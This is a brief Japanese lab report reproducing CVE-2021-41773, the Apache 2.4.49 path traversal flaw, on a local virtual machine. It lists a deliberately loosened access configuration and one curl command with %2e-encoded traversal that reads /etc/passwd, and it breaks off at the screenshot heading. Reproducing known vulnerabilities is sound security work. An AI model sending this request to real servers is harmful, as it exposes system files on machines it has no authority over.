CVE-2021-41773 脆弱性再現レポート
脆弱性の概要
- CVE ID: CVE-2021-41773
- 脆弱性名称: Apache HTTP Server パストラバーサル脆弱性
- リスクレベル: 高 (CVSS 7.5)
- 影響を受けるバージョン: Apache HTTP Server 2.4.49
- 脆弱性の説明: Apache HTTP Server 2.4.49 にはパス正規化関数
ap_normalize_path の実装に欠陥があり、攻撃者は %2e エンコードを含む特別なリクエストを構築することでアクセス制御をバイパスし、Web サーバー上の任意のファイルを読み取ることができます。
環境構築
- オペレーティングシステム: Ubuntu 20.04 (仮想マシン)
- Webサーバー: Apache httpd 2.4.49 (手動コンパイルインストール)
- ターゲット環境: 独立実行、ポート 8080 で待ち受け
- 主要な設定:
<Directory /> の Require all denied を Require all granted に変更
- Alias
/vuln を /tmp/vuln_dir に追加し、権限を設定
脆弱性再現
攻撃コマンド
curl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
攻撃スクリーンショット
